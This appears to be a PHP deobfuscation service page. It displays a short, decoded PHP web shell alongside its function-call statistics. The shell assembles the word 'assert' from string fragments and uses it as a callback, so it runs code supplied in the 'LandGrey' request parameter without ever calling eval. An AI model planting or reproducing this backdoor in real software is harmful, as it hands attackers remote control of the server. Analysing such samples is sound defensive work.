Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /** * Noticed: (PHP 5 >= 5.4.0, PHP 7) * */ $password = "LandGrey"; $ch = e..
Decoded Output download
<?php
/**
* Noticed: (PHP 5 >= 5.4.0, PHP 7)
*
*/
$password = "LandGrey";
$ch = explode(".","hello.ass.world.er.t");
array_intersect_ukey(array($_REQUEST[$password] => 1), array(1), $ch[1].$ch[3].$ch[4]);
?>
Did this file decode correctly?
Original Code
<?php
/**
* Noticed: (PHP 5 >= 5.4.0, PHP 7)
*
*/
$password = "LandGrey";
$ch = explode(".","hello.ass.world.er.t");
array_intersect_ukey(array($_REQUEST[$password] => 1), array(1), $ch[1].$ch[3].$ch[4]);
?>
Function Calls
explode | 1 |
array_intersect_ukey | 1 |
Stats
MD5 | 7667fddd213421738ce49192d1276f91 |
Eval Count | 0 |
Decode Time | 106 ms |